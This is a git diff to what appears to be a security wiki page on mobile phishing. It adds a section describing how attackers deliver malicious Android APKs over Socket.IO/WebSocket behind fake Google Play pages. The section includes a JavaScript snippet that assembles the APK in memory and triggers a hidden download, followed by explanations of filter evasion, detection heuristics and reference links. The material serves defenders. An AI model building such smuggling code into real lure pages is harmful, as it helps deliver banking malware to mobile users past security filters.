diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md index de7c1ab53..7ca3e849f 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md @@ -222,6 +222,49 @@ public void onMessageReceived(RemoteMessage msg){ --- +## Socket.IO/WebSocket-based APK Smuggling + Fake Google Play Pages + +Attackers increasingly replace static APK links with a Socket.IO/WebSocket channel embedded in Google Play–looking lures. This conceals the payload URL, bypasses URL/extension filters, and preserves a realistic install UX. + +Typical client flow observed in the wild: + +```javascript +// Open Socket.IO channel and request payload +const socket = io("wss:///ws", { transports: ["websocket"] }); +socket.emit("startDownload", { app: "com.example.app" }); + +// Accumulate binary chunks and drive fake Play progress UI +const chunks = []; +socket.on("chunk", (chunk) => chunks.push(chunk)); +socket.on("downloadProgress", (p) => updateProgressBar(p)); + +// Assemble APK client‑side and trigger browser save dialog +socket.on("downloadComplete", () => { + const blob = new Blob(chunks, { type: "application/vnd.android.package-archive" }); + const url = URL.createObjectURL(blob); + const a = document.createElement("a"); + a.href = url; a.download = "app.apk"; a.style.display = "none"; + document.body.appendChild(a); a.click(); +}); +``` + +Why it evades simple controls: +- No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames. +- URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO. +- Crawlers and URL sandboxes that don’t execute WebSockets won’t retrieve the payload. + +Hunting and detection ideas: +- Web/network telemetry: flag WebSocket sessions that transfer large binary chunks followed by creation of a Blob with MIME application/vnd.android.package-archive and a programmatic `` click. Look for client strings like socket.emit('startDownload'), and events named chunk, downloadProgress, downloadComplete in page scripts. +- Play-store spoof heuristics: on non-Google domains serving Play-like pages, hunt for Google Play UI strings such as http.html:"VfPpkd-jY41G-V67aGc", mixed-language templates, and fake “verification/progress” flows driven by WS events. +- Controls: block APK delivery from non-Google origins; enforce MIME/extension policies that include WebSocket traffic; preserve browser safe-download prompts. + +See also WebSocket tradecraft and tooling: + +{{#ref}} +../../pentesting-web/websocket-attacks.md +{{#endref}} + + ## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study The RatOn banker/RAT campaign (ThreatFabric) is a concrete example of how modern mobile phishing operations blend WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, and even NFC-relay orchestration. This section abstracts the reusable techniques. @@ -394,5 +437,8 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging) - [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats) - [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay) +- [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) +- [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) +- [Socket.IO](https://socket.io) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}}